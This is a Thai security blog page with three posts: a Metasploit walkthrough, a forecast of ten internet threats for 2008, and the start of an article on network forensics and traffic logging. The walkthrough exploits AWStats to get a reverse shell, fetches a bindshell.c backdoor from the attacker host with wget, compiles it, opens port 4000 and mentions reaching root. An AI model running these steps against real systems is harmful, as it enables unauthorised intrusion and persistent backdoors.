Saturday, December 15

ความน่าสนใจของ Metasloit

Metasploit เป็นเครื่องมือแบบ open source ที่สามารถใช้เพื่อพัฒนา ทดสอบ และใช้ exploit
# wget http://www.metasploit.com/tools/framework-2.5.tar.gz
--12:48:57-- http://www.metasploit.com/tools/framework-2.5.tar.gz
=> `framework-2.5.tar.gz'
Resolving www.metasploit.com... 66.234.161.200
Connecting to www.metasploit.com|66.234.161.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,625,719 (2.5M) [application/x-gzip]

100%[========================================================================================>] 2,625,719 11.23K/s ETA 00:00

12:53:14 (10.05 KB/s) - `framework-2.5.tar.gz' saved [2625719/2625719]

แตกไฟล์โดยใช้คำสั่ง tar
# tar -zxvf framework-2.5.tar.gz
framework-2.5/
framework-2.5/lib/
framework-2.5/lib/Msf/
framework-2.5/lib/Msf/Nop/
framework-2.5/lib/Msf/Nop/OptyNop2.pm
framework-2.5/lib/Msf/Nop/OptyNop2Tables.pm
framework-2.5/lib/Msf/PayloadComponent/
framework-2.5/lib/Msf/PayloadComponent/BSD/
framework-2.5/lib/Msf/PayloadComponent/BSD/ia32/

framework-2.5/extras/Term-ReadLine-Gnu-1.14.tar.gz
framework-2.5/msfcli
framework-2.5/msfweb
framework-2.5/msfpayload

เข้าไปในไดเร็กทอรี framework-2.5
# cd framework-2.5
[root@ca framework-2.5]# ls
data exploits msfcli msfencode msfpescan nops src
docs extras msfconsole msflogdump msfupdate payloads tools
encoders lib msfelfscan msfpayload msfweb sdk

เรียก console
# ./msfconsole


__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.5 [105 exploits - 74 payloads]

พิมพ์ help เพื่อดู option ที่สามารถใช้ได้
msf > help

Metasploit Framework Main Console Help
======================================

? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version

แสดง exploit ที่มี
msf > show exploits
Metasploit Framework Loaded Exploits
====================================

3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution

เรียกใช้ exploit ที่โจมตี awstats
msf > use awstats_configdir_exec

msf awstats_configdir_exec(cmd_unix_reverse) > set RHOST 192.168.1.204
RHOST -> 192.168.1.204
msf awstats_configdir_exec(cmd_unix_reverse) > set DIR /cgi-bin/
DIR -> /cgi-bin/
msf awstats_configdir_exec(cmd_unix_reverse) > set LHOST 192.168.1.203
LHOST -> 192.168.1.203
msf awstats_configdir_exec(cmd_unix_reverse) > set LPORT 4321
LPORT -> 4321

แสดง option ของ exploit
msf awstats_configdir_exec(cmd_unix_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------------- -----------------------------------
optional SSL Use SSL
required RHOST 192.168.1.204 The target address
optional VHOST The virtual host name of the server
required DIR /cgi-bin/ Directory of awstats.pl script
required RPORT 80 The target port

Payload: Name Default Description
-------- ------ ------------- -----------------------------------
required LHOST 192.168.1.203 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Targetless Exploit

แสดง payload
msf awstats_configdir_exec > show payloads

Metasploit Framework Usable Payloads
====================================

cmd_generic Arbitrary Command
cmd_irix_bind Irix Inetd Bind Shell
cmd_unix_reverse Unix Telnet Piping Reverse Shell


เซ็ต payload ให้เป็น cmd_unix_reverse
msf awstats_configdir_exec(cmd_generic) > set PAYLOAD cmd_unix_reverse
PAYLOAD -> cmd_unix_reverse
msf awstats_configdir_exec(cmd_unix_reverse) > exploit
[*] Starting Reverse Handler.
[*] Establishing a connection to the target...

Trying 192.168.1.203...

Escape character is '^]'.
[*] Recieved first connection.
[*] Recieved second connection.
[*] Got connection from 192.168.1.203:4321 <-> 192.168.1.204:32796 192.168.1.203:4321 <-> 192.168.1.204:32797

id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/usr/local/awstats/wwwroot/cgi-bin


ดาวน์โหลด bindshell.c ซึ่งเป็น backdoor ที่เปิดพอร์ต 4000 ไว้
cd /tmp
wget http://192.168.1.203/bindshell.c
--16:08:20-- http://192.168.1.203/bindshell.c
=> `bindshell.c'
Connecting to 192.168.1.203 ... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,083 [text/plain]

0K .. 100% 135.61 KB/s

16:08:20 (135.61 KB/s) - `bindshell.c' saved [2083/2083]

ls
bindshell.c
ssh-GDMM1551
ssh-dovU4939
gcc -o bindshell bindshell.c
ls
bindshell
bindshell.c
ssh-GDMM1551
ssh-dovU4939
./bindshell
Daemon is starting...OK, pid = 1648

Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.

msf awstats_configdir_exec(cmd_unix_reverse) > exit

telnet เข้าไปที่พอร์ต backdoor
# telnet 192.168.1.204 4000
Trying 192.168.1.204...
Connected to www.sran.net (192.168.1.204).
Escape character is '^]'.
sh-2.05b$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.05b$ sh-2.05b$ ls -al
total 204
drwxr-xr-x 19 root root 4096 Dec 16 15:18 .
drwxr-xr-x 19 root root 4096 Dec 16 15:18 ..
-rw-r--r-- 1 root root 0 Dec 16 15:18 .autofsck
drwxr-xr-x 2 root root 4096 Nov 28 12:23 bin
drwxr-xr-x 3 root root 4096 Nov 28 10:53 boot
drwxr-xr-x 21 root root 118784 Dec 16 15:19 dev
drwxr-xr-x 47 root root 4096 Dec 16 15:19 etc
drwxr-xr-x 5 root root 4096 Dec 1 11:25 home
drwxr-xr-x 2 root root 4096 Oct 7 2003 initrd
drwxr-xr-x 8 root root 4096 Nov 28 12:22 lib
drwx------ 2 root root 16384 Nov 28 05:45 lost+found
drwxr-xr-x 2 root root 4096 Sep 8 2003 misc
drwxr-xr-x 4 root root 4096 Nov 28 11:12 mnt
drwxr-xr-x 2 root root 4096 Oct 7 2003 opt
dr-xr-xr-x 60 root root 0 Dec 16 10:18 proc
drwxr-x--- 3 root root 4096 Dec 16 13:13 root
drwxr-xr-x 2 root root 8192 Nov 28 12:23 sbin
drwxrwxrwt 4 root root 4096 Dec 16 16:08 tmp
drwxr-xr-x 15 root root 4096 Nov 28 10:50 usr
drwxr-xr-x 18 root root 4096 Nov 28 10:56 var
sh-2.05b$ sh-2.05b$ cd /var/tmp
sh-2.05b$ sh-2.05b$ ls -al
total 8
drwxrwxrwt 2 root root 4096 Dec 15 14:59 .
drwxr-xr-x 18 root root 4096 Nov 28 10:56 ..
sh-2.05b$ sh-2.05b$ uname -a
Linux app.sran.org 2.4.22-1.2115.nptl #1 Wed Oct 29 15:20:17 EST 2003 i586 i586 i386 GNU/Linux



เมื่อได้ user ในระบบเป็น apache แล้วผมจึงพยายามต่อไปเพื่อให้ได้สิทธิ์ของ root การที่ระบบนี้ใช้ Linux kernel เวอร์ชั่นเก่าทำให้ไม่ยากที่จะหา exploit เพื่อโจมตีช่องโหว่ใน kernel และผมก็ได้ root ในที่สุด

นนทวรรธนะ สาระมาน
Nontawattana Saraman
SRAN Dev

Monday, December 3

ทำนาย 10 ภัยคุกคามทางอินเตอร์เน็ท 2008

ใกล้หมดปีไปอีกครั้งแล้วนะครับ ใครตั้งใจจะทำอะไรไว้ ยังไม่ได้ทำภายในปีนี้ก็ขอให้เรียบๆทำกันไว้ เวลานั้นไม่เคยคอยใคร พอใกล้หมดปี ก็มักจะมีคำทำนายในเรื่องต่างๆ เช่นกันในปีหน้า ภัยคุกคามในรูปแบบใหม่ๆ ที่อาจจะเกิดขึ้นในปี 2008 จะเป็นอย่างไรบ้างลองรับฟังกันดูเผื่อไว้ว่าจะช่วยในการป้องกัน กันได้ทัน เท่าที่ผ่านมาได้ค้นหาข้อมูลเกี่ยวกับภัยคุกคามทางอินเตอร์เน็ทในรูปแบบ ใหม่ๆ พบว่ามีหลายสำนักได้ตั้งข้อสังเกตไว้พอสมควร โดยเฉพาะเจ้าแรกที่กล้าออกมาทำนาย นั้นคือ Mcafee ยักษ์ใหญ่ในวงการ IT Security ระดับโลก ในทีมงาน SRAN ก็ได้เขียนทำนายไว้เช่นกัน ซึ่งมีความใกล้เคียงกับทาง Mcafee และคิดว่าในปี 2008 ภัยคุกคาม จะเน้นในเรื่องความเป็นส่วนตัวมากขึ้น ข้อมูลที่เป็นข้อมูลส่วนบุคคล ความประมาทในการใช้งานของ User รวมถึงอาชญากรรมคอมพิวเตอร์ ในรูปแบบต่างๆ ที่ทวีความซับซ้อน จะแบ่งหมวดหมู่ภัยคุกคามได้ดังนี้ครับ
กลุ่มภัยคุกคามที่พบในปี 2008
กลุ่มที่ 1 กองทัพ botnet ตัวกลางเชื่อมต่อภัยคุกคามในรูปแบบต่างๆ

กลุ่มที่ 2 ช่องโหว่ของระบบปฏิบัติการ
กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท
กลุ่มที่ 1 กองทัพ Botnet ตัวกลางเชื่อมต่อภัยคุกคามในรูปแบบต่างๆ

ภัยคุกคามอันดับที่ 1 Storm Worm : อาชญกรทางคอมพิวเตอร์ จะใช้เทคนิคการสร้าง Storm Worm เพื่อกลบเกลื่อนร่องรอย สร้างสายพันธ์ของ worm ในการเปลี่ยนโค้ดที่ทำให้ระบบซอฟต์แวร์ Anti virus ไม่สามารถตรวจจับได้ ซึงการเกิด Storm Worm นั้นเป็นการติดโปรแกรมไม่พึ่งประสงค์ บนเจตนาของผู้บุกรุกที่สร้างขึ้น โปรแกรมไม่พึ่งสงค์เรียกอีกอย่างหนึ่งว่า “malware” คือซอฟต์แวร์ที่สูญเสีย C (Confidentiality) I (Integrity) และ A (Availability) อย่างใดอย่างหนึ่ง หรือ ทั้งหมด จนทำให้เกิดเป็น Virus , Worm , Trojan , Spyware , Backdoor และ Rootkit ซึ่ง Storm worm เป็นลักษณะการแพร่กระจายสายพันธ์ ที่มีการเปลี่ยนแปลงโค้ด ทำให้เกิดความเสียหายกับเครื่องที่ติด worm เหล่านี้ ผลลัพธ์ของ Storm worm คือเครื่องที่ติด worm ชนิดเหล่านี้จะถูกเรียกว่า “Zombie” ที่พร้อมที่จะควบคุมให้ทำการใดการหนึ่ง เช่น การส่ง Spam , การโจมตีชนิดที่เรียกว่า DDoS/DoS เป็นต้น หาก Zombie จำนวนมากกว่า 1 เครื่อง ก็เรียกว่า Botnet นั้นเอง ในปี 2008 กองทัพ Botnet ที่พร้อมใช้งานจะมีอัตราที่สูงขึ้น และอาจมีการซื้อขาย กองทัพ Botnet ในกลุ่มอาชญกรคอมพิวเตอร์ เพื่อใช้โจมตีเครือข่ายเครือข่ายขนาดใหญ่ ได้ต่อไป

ภัยคุกคามอันดับที่ 2 : Parasitics Malware เป็นไวรัสที่แก้ไขไฟล์ที่อยู่ในดิสก์ และใส่โค้ดเข้าไปในไฟล์ ในปีที่ผ่านมาจะพบว่าผู้เขียนไวรัสจะใช้วิธีนี้สร้างไวรัสชนิดต่างๆ ตัวอย่างเช่น Grum , Virut และ Almanahe คาดว่าจะมี Parasitics Malware เติบโตขึ้นในปี 2008 และการฝั่งโค้ดเข้าไปในไฟล์ จากเดิมเน้นการทำลายเครื่องให้เกิดความผิดปกติ ก็จะทำฝั่งตัวควบคุมเครื่อง อาจเป็น Backdoor , Trojan , หรือ Script บางอย่างที่ทำให้เครื่องติด Parasitic Malware ตกเป็นทาส (Zombie) ได้ซึ่งการเกิด Zombie หลายๆเครื่อง ก็จะกลายเป็นกองทัพ Botnet ที่พร้อมใช้งานในการโจมตีต่อไป

สัดส่วนการเจริญเติบโตจากภัยคุกคามชนิด Parasitics Malware จาก Mcafee

ภัยคุกคามอันดับที่ 3 : การยึดระบบเสมือนจริง (Virtualization) ผู้ สร้าง Malware พยายามค้นหาช่องโฆว่ในระบบ Virtualization มากขึ้นการที่ได้ควบคุมระบบปฏิบัติการเสมือน ในการสร้างกองทัพ Botnet และเพื่อการแพร่กระจายการติดเชื้อแบบ Storm worm ขึ้น ทั้งนี้เพื่อสร้างจำนวน Zombie แบบไร้ตัวตนให้มากขึ้น Virtualization เป็นเทคโนโลยีที่ช่วยให้สามารถแบ่งพาทิชันคอมพิวเตอร์ให้สามารถรันซอฟต์แวร์ และแอพพลิเคชันในจำนวนมากๆ หรือแม้แต่รันระบบปฏิบัติการได้หลายๆ ตัวพร้อมกันซึ่งพื้นที่ที่แบ่งพาทิชันขึ้นนั้นมักรู้จักกันว่า “Virtual Space” หรือ “Container” โดยปัจจุบัน Virtual lization Technology มีการใช้งานกันมากขึ้น

ช่องโหว่ที่ค้นพบบนระบบเสมือน

ภัยคุกคามอันดับที่ 4 FastFlux เป็นเทคนิคทาง DNS ที่ใช้โดย Botnet เพื่อซ่อนเว็บไซต์ที่ทำหน้าที่ให้บริการ Phisihing และมัลแวร์ ที่อยู่เบื้องหลังเครือข่ายของโฮสต์ที่ถูกบุกรุกทำตัวเป็น Proxy ที่มีการเปลี่ยนแปลงตลอดเวลา รวมถึงเครือข่ายแบบ Peer-to-Peer รวมกันหลายเครือข่าย ใช้เทคนิคต่างๆ ได้แก่ การใช้คำสั่งและการควบคุมแบบกระจาย (Distributed) การใช้ Load Balancing และการเปลี่ยนเส้นทาง proxy เพื่อทำให้การเครือข่ายมัลแวร์ยากต่อการถูกตรวจพบและการป้องกัน Storm Worm เป็นหนึ่งในมัลแวร์ที่ใช้เทคนิคเหล่านี้ผู้ใช้อินเทอร์เน็ตอาจพบการใช้ fast flux ในการโจมตี phishing ที่มีเชื่อมโยงกับกลุ่มอาชญากร รวมถึงการโจมตี MySpace ด้วยในปี 2008 นี้

ในปี 2008 อาจมีอาชีพใหม่ ในการค้าขาย กองทัพ botnet ในตลาดอินเตอร์เน็ทก็เป็นได้ ทั้งนี้กองทัพ botnet อาจจะมีมากในประเทศที่พึ่งมีการเชื่อมต่ออินเตอร์เน็ท และระบบเครือข่ายใหม่ๆ ที่ยังขาดการป้องกันภัยที่ดี อีกทั้งจะมีจำนวนมากขึ้นสำหรับประเทศที่ยังไม่มีกฎหมายเอาผิดกับผู้ใช้ botnet ซึ่งผลที่เกิดจากการโจมตีของ Botnet ไม่ใช่แค่เพียงการส่ง Spam , DDoS/DoS , Virus/worm อีกต่อไป แต่เป็นภัยคุกคามอื่น ที่คาดไม่ถึงว่าจะเกิดขึ้นก็เป็นไปได้

จำนวน botnet ในแต่ละวัน

กลุ่มที่ 2 ภัยคุกคามจากช่องโหวที่พบบนระบบปฏิบัติการ ่

ภัยคุกคามอันดับ 5 : Operating System Vulnerability : ระบบปฏิบัติการที่เรารู้จักกันดี ไม่ว่าเป็น Linux / BSD , MaC OS หรือ Windows Microsoft นำไปใช้บน Appliance ต่างๆ รวมไปถึงระบบมือถือ ที่ในปีหน้า 2008 นี้เองจะเห็นว่าคนทั่วไปพกมือถือที่มีมัลติมีเดีย และสามารถท่องโลกอินเตอร์เน็ทได้ สามารถทำอะไรๆ ที่ต้องการได้ ทำงานแทน Notebook ได้ ไม่ว่าเป็นมือถือที่ระบบปฏิบัติการของ Mac ที่ชื่อว่า iPhone หรือพวก Windows Mobile ซึ่งในปีหน้าอาจพบช่องโหว่ต่างๆ ที่เกิดขึ้นบนเครื่องมือถือมากขึ้น ไม่ว่าเป็นพวก Virus/worm, Spam เหล่านี้สร้างความเสียหายไม่น้อยกว่าเครื่อง PC ที่ใช้กันทั่วไป ที่เป็นเช่นนี้ก็เนื่องจาก Application ที่มากขึ้น บนตัวระบบ Operating System ทำให้ภาพรวมการใช้งาน จะพบช่องโหว่มาขึ้นจาก Application มากกว่า OS ก็ตาม หลายคนยังตั้งข้อสังเกตถึงระบบปฏิบัติการใหม่ของ Windows Microsoft ที่ชื่อว่า Vista ที่ยังมีช่องโหว่และไม่ได้รับการแก้ไขให้ทันเวลา ซึ่งจะขยายผลต่อให้เกิดภัยคุกคามใหม่ที่ฝั่งเข้าสู่ระบบ และสร้างเป็น Zombie ต่อไปได้เช่นกัน

กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท

กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท ซึ่งส่วนตัวผมถือว่าเป็นกลุ่มภัยคุกคามประจำปี 2008 เนื่องจากการเจริญเติบโตการใช้งานอินเตอร์เน็ทที่มากขึ้นและความซับซ้อนของ รูปแบบการใช้งาน มีผลให้เกิดอาชญกรรมเกี่ยวกับการขโมยข้อมูลส่วนตัว การนำข้อมูลส่วนตัวมาเผยแพร่ โดยไม่ได้รับอนุญาติ และการหลอกหลวงทางเทคโนโลยีต่างๆ ที่เกี่ยวข้องกับการใช้งาานอินเตอร์เน็ท ส่วนบุคคลมากขึ้นนั่นเอง สรุปว่ากลุ่มนี้ เหยื่อมักเกิดจาก ความรู้เท่าไม่ถึงการณ์ การทำนายภัยคุกคามที่อาจเกิดขึ้นในปี 2008 ในกลุ่มที่ 3 นี้ก็เพื่อป้องกันไม่สิ่งเหล่านี้เกิดกับตนเอง และคนใกล้ตัวให้พึ่งระวังได้

ภัยคุกคามอันดับที่ 6 : ซอฟต์แวร์ไม่พึ่งประสงค์จากการใช้สนทนาออนไลท์ (Instant Malware) เป็นการใช้งานที่ประมาทของผู้ใช้เอง ที่อาจจะดาวโหลดซอฟต์แวร์จาก คู่สนทนาที่ไม่รู้จัก หรือรู้จัก มีไฟล์แนบมา หรือที่พบมากขึ้นคือ ในรูปแบบของ Flash ที่สามารถเอ็กซิคิวท์ตัวเองได้ มาพร้อมกับโปรแกรมประเภท Instant Messaging

ช่องโหว่ที่ค้นพบจากการใช้งาน IM ในแต่ละปี

ภัยคุกคามอันดับที่ 7 : บริการเกมส์ออนไลน์ (Online Gaming) ผู้ใช้บริการอาจตกเป็นเหยื่อ เนื่องจากของในเกมส์สามารถซื้อขายกันเงินจริงๆได้ ตัวอย่างเห็นได้จากโทรจันที่ขโมยรหัสผ่านของบริการเกมส์ออนไลน์ ในปี 2007 จะมีอัตราเติบโตเร็วกว่าจำนวนของโทรจันที่มีเป้าหมายกับผู้ใช้บริการของ ธนาคาร

Powered by Gregarious (42)
ภัยคุกคามอันดับที่ 8 : สังคมออนไลท์แบบเปิด (Social Networking) กับการใช้ข้อมูลบน Web 2.0 เป็นที่รู้กันว่าสังคมแบบเปิดบนโลกอินเตอร์เน็ทมีจำนวนมากขึ้นจากเทคโนโลยี Web 2.0 สิ่งที่ตามมา ผมเคยทำนายไว้ในบท 7 ภัยคุกคามปี 2007 ไปแล้วว่าการควบคุม Social Networking เป็นเรื่องยาก เพื่อเนื้อหาเกิดจากผู้ใช้งานทุกคน ทุกคนมีส่วนร่วมในการสร้างเนื้อบนเว็บไซด์ การควบคุมเรื่องนี้เป็นเรื่องยาก เรามักได้ยินข่าวการโพสเรื่องราวการหมิ่นประมาทสิทธิส่วนบุคคล การกล่าวร้าย การกล่าวเท็จ ปิดเบือนข้อเท็จจริง บน Web 2.0 รวมถึงพวก Web Board อยู่ตลอดทั้งปี ไม่ว่าเป็น Youtube , Camfroge , Myspace.com เป็นต้น หรือแม้เว็บไทยของเราก็มีจำนวนไม่น้อยที่เกิดเรื่องเหล่านี้ การควบคุมทัศนะคติแต่บุคคลที่เข้ามา Post เนื้อหาในเว็บเป็นเรื่องที่ควบคุมลำบาก แต่เป็นเรื่องไม่ยากในการทราบที่มาที่ไปของการ Post สิ่งเหล่านี้ จึงทำให้มีการหลอกหลวงจากความรู้เท่าไม่ถึงการณ์จากการใช้งาน Web 2.0 มากขึ้น และผลการคาดการแล้วพบว่าอาจเกิดมีผู้โจมตีจะใช้เวบไซต์ที่ใช้เทคโนโลยี Web 2.0 เพื่อแพร่กระจายมัลแวร์และรวบรวมข้อมูลต่าง ๆ ที่ต้องการจากเว็บเพื่อค้นหาข้อมูลที่ผู้ใช้แชร์ไว้เพื่อทำให้การโจมตีดู เหมือนจริงมากยิ่งขึ้น

ภัยคุกคามอันดับที่ 9 การหลอกลวงจากการใช้เทคโนโลยี VoIP : ในปีคศ.2007 จำนวนของช่องโหว่ที่รายงานเกี่ยวกับ VoIP มากกว่ารายงานช่องโหว่ในปีคศ.2006 ถึงสองเท่า นอกจากนี้ยังมีรายงานเกี่ยวกับการโจมตีที่เรียกว่า vishing และ phreaking ซึ่งอาจเกิด Spam บน VoIP และการหลอกลวงจาก Botnet ที่เป็นเสียงมากับมือถือโดยใช้เทคนิค (Social Engineering) ได้เช่นกัน

VoIP-Voice Over IP หรือที่เรียกกันว่า “VoIP Gateway” หมายถึง การส่งเสียงบนเครือข่ายไอพี เป็นระบบที่แปลงสัญญาณเสียงในรูปของสัญญาณไฟฟ้ามาเปลี่ยนเป็นสัญญาณดิจิตอล คือ นำข้อมูลเสียงมาบีบอัดและบรรจุลงเป็นแพ็กเก็ต ไอพี (IP) แล้วส่งไปโดยมีเราเตอร์ (Router) ที่เป็นตัวรับสัญญาณแพ็กเก็ต และแก้ปัญหาบางอย่างให้ เช่น การบีบอัดสัญญาณเสียงให้มีขนาดเล็กลง การแก้ปัญหาเมื่อมีบางแพ็กเก็ตสูญหาย หรือได้มาล่าช้า (delay)การสื่อสารผ่านทางเครือข่ายไอพีต้องมีเราเตอร์ (Router) ที่ทำหน้าที่พิเศษเพื่อประกันคุณภาพช่องสัญญาณไอพีนี้ เพื่อให้ข้อมูลไปถึง ปลายทางหรือกลับมาได้อย่างถูกต้องและอาจมีการให้สิทธิพิเศษก่อนแพ็กเก็ตไอพี อื่น (Quality of Service : QoS) เพื่อการให้บริการที่ทำให้เสียงมีคุณภาพ

นอกจากนั้น Voice over IP (VoIP) ยังเป็นการส่งข้อมูลเสียงแบบ 2 ทางบนระบบเครือข่ายแบบ packet-switched IP network. ซึ่งข้อมูลนี้จะถูกส่งผ่านเครือข่ายอินเตอร์เน็ตสาธารณะเพื่อสื่อสารระหว่าง VoIP ด้วยกัน โดยที่ยังคงความเป็นส่วนตัวไว้ได้

เทคโนโลยีนี้ยังใหม่และยังขาดวิธีที่ใช้ในการป้องกัน คาดว่าจะมีการโจมตี VoIP เพิ่มขึ้นร้อลละ 50 ในปีคศ.2008 หรือแม้แต่กระทั่งมัลแวร์ (Malware) ที่โจมตี VoIP แพร่กระจายสู่วงกว้าง

ภัยคุกคามอันดับ 10 :การติดกับดักทางข้อมูล (Information pitfall) เรื่องนี้ผมถือว่าเป็นเรื่องใหญ่ และเคยเขียนบทความเรื่องนี้ในเดือนเมษายน ปี 2007 ที่บอกว่าเป็นเรื่องใหญ่เพราะว่าเป็นการสร้างความเชื่อให้เกิดขึ้นกับบุคคล การสร้างกลยุทธการตลาดเข้ามาเพื่อสร้างภาพ สร้างความเชื่อ หากเป็นความเชื่อที่เป็นสิ่งที่ถูกต้อง และมีคุณธรรม ก็ดีไป แต่หากเป็นการสร้างความเชื่อ เพื่อหลอกหลวง ก็จะทำให้เกิดความเสียหายได้เช่นกัน ตัวอย่างเราจะพบว่า Scam Web , Phishing Web , Adsware ที่ติดมากับ Web ถึงแม้จะจำนวนน้อยลงเพราะคนเริ่มตะหนักถึงภัยคุกคามที่ตามจากเข้าเว็บพวกนี้ แต่ก็ยังมีจำนวนคนไม่น้อยที่ยังตกเป็นเหยื่ออยู่ตลอดทั้งปี สิ่งนี้จะจางหายไปกับกับระบบป้องกันภัยทั้งด้านระบบป้องกันภัยทางเครือข่าย (Network) และระบบป้องกันภัยระดับเครื่องคอมพิวเตอร์ (Host) ที่มีความทันสมัยและฉลาดในวิธีการป้องกันก็ตาม การสร้างค่านิยม บนความเชื่อ ถือว่ามีความเกี่ยวพันกับความมั่นคงของชาติในอนาคต มันอาจเป็นเรื่องพูดได้ยากในขณะนี้ เพราะทุกคน ยินดีต้อนรับเทคโนโลยีที่มาจากต่างประเทศ โดยไม่คิดว่าผลสืบเนื่องในอนาคต ซึ่งอาจนำมาถึงการตกเป็นอนานิคมทางเทคโนโลยี (Information Technology Colonization) โดยยินยอมพร้อมใจก็ได้

ความเชื่อ จากค่านิยม ที่คิดว่าต่างประเทศดีกว่าเรา เป็นเรื่องยากที่แก้ไข แต่ไม่สายที่ดำเนินการ ถึงเวลาที่เราทุกคนต้องสร้างความเชื่อมั่นว่า คนไทยไม่แพ้ไคร ไม่ได้ด้อยไปกว่าใครในโลกนี้

สวัสดีปีใหม่ครับ

นนทวรรธนะ สาระมาน
Nontawattana Saraman

Tuesday, October 30

Network Time Machine ตอนที่ 1


... หากเราสามารถย้อนเวลาได้ เราจะทำอะไร? แน่นอนเราคงทำในสิ่งที่เราตัดสินใจผิดพลาดมาในอดีต แต่ในความเป็นจริงเราไม่สามารถย้อนเวลาได้ นอกจากจะยอมรับในการตัดสินใจของเราเอง ...

ในสมัยก่อนย้อนเวลาไป ในปี 1985 หรือ ปี พศ. 2528 เคยมีหนังเรื่องหนึ่งที่ผมชอบมาก คือ Back To The Future ภาค 1 นำแสดงโดย Michael J. Fox ตัวพระเอกในเรื่องเองสามารถย้อนเวลากลับไปได้ โดยใช้รถยนต์ ที่เรียกว่า เป็น Time Machine เป็นหนังตลก และสนุก มีสีสัน รวมถึงมีฉากที่สวยๆ น่ารัก สมควรแก่การสะสม

การสืบค้นร่องรอยเพื่อพิสูจน์หลักฐานทางข้อมูลสารสนเทศ นี้ ศัพ์ทางภาษาอังกฤษเรียกว่า Chain of Custody หรือ Chain of Evidence ที่มีความสอดคล้องกับสิ่งที่ต้องการรู้ เพื่อรับทราบถึงเหตุปัจจัย Network Time Machine คือศัพท์ที่เกี่ยวข้องกับวิธีการย้อนเวลาเพื่อสืบหาต้นเหตุของหลักฐาน โดยใช้เทคโนโลยีบนระบบเครือข่าย ผมจึงระบุศัพท์คำนี้ขึ้น โดยไม่ได้สนใจพจนานุกรมทางคอมพิวเตอร์ อีกแล้ว ..

ในโลกระบบเครือข่ายคอมพิวเตอร์แล้ว เมื่อเกิดเหตุการณ์ไม่คาดฝันขึ้น และเราต้องการทราบถึงที่มาที่ไป หรือที่เรียกว่า กระแสของเหตุปัจจัย หรือ อิทัปปัจจยตา สิ่งใดมีเพราะมีเหตุปัจจัยให้มี ส่ิงใดไม่มีเพราะไม่มีเหตุปัจจัยให้มี ไม่มีอะไรมีหรือไม่มีโดยตัวของมันเอง "สิ่งนี้เกิดสิ่งนี้จึงเกิด สิ่งนั้นไม่เกิดสิ่งนั้นจึงไม่เกิด"
เรามักจะนึกถึงการเก็บบันทึกข้อมูลจราจร หรือภาษาอังกฤษที่เรียกว่า Log จาก Data Traffic เราถึงจะวิเคราะห์ย้อนหลังไปได้ ว่ามีเหตุการณ์อะไรเกิดขึ้น ซึ่งเป็นที่มาของศาสตร์ที่เรียกว่า Network/Computer Forensics นั้นเอง แน่นอนการเก็บบันทึกเหตุการณ์เหล่านั้นเป็นไปตามเนื้อผ้า เก็บอย่างที่เห็นว่าควรจะเป็น หากไม่มีการแก้ไขข้อมูลจากผู้ไม่หวังดี เสียก่อน
บทความนี้ส่วนหนึ่ง ผมเขียนขึ้นเพื่อสร้างความเข้าใจถึงกรรมวิธีการเก็บข้อมูลจราจร (Data Traffic) อย่างน้อยคงได้ประโยชน์สำหรับการนำไปใช้ประยุกต์กับ การเก็บข้อมูลตาม พรบ. ว่าด้วยการกระทำผิดทางคอมพิวเตอร์ ที่ประกาศใช้ เมื่อไม่นานนี้
กรรมวิธีในการเก็บข้อมูลจราจร มีด้วยกัน 3 วิธี แบ่งได้ดังนี้
1. ข้อมูลที่เกิดขึ้นบนระดับเครื่อง (Local Host Log) ไม่ว่่าจะเป็นระดับเครื่องลูกข่าย (Client) หรือ เครื่องแม่ข่าย (Server) การเก็บในหัวข้อนี้เป็นเรื่องละเอียดอ่อน และมีคุณค่าในการทำ Computer Forensics หรือที่เรียกว่า การสืบหาหลักฐานทางคอมพิวเตอร์ เรามักจะเก็บ Log จาก System , Application และ User เป็นหลัก ในแต่ละเครื่องย่อมมี Application ที่แตกต่างกัน ส่วน User แล้วจะมีประโยชน์มากสำหรับเครื่องที่เป็นแม่ข่าย (server) การเก็บบันทึกข้อมูลจราจรขึ้นอยู่กับระบบปฏิบัติการ และมีซอฟต์แวร์ทุ่นแรงมาแล้วจากระบบปฏิบัติการ โดยเฉพาะระบบปฏิบัติการ Windows ซึ่งมี GUI ที่ดูแล้วสะดวกในการใช้งาน ทั้งหมดนี้ขึ้นตรงกับเวลา (Time) ที่เป็นตัวกำหนดชะตาบนเครื่องนั่นๆ ไม่ว่าเป็น
System มีความผิดปกติ จากอะไร ช่วงเวลาใด
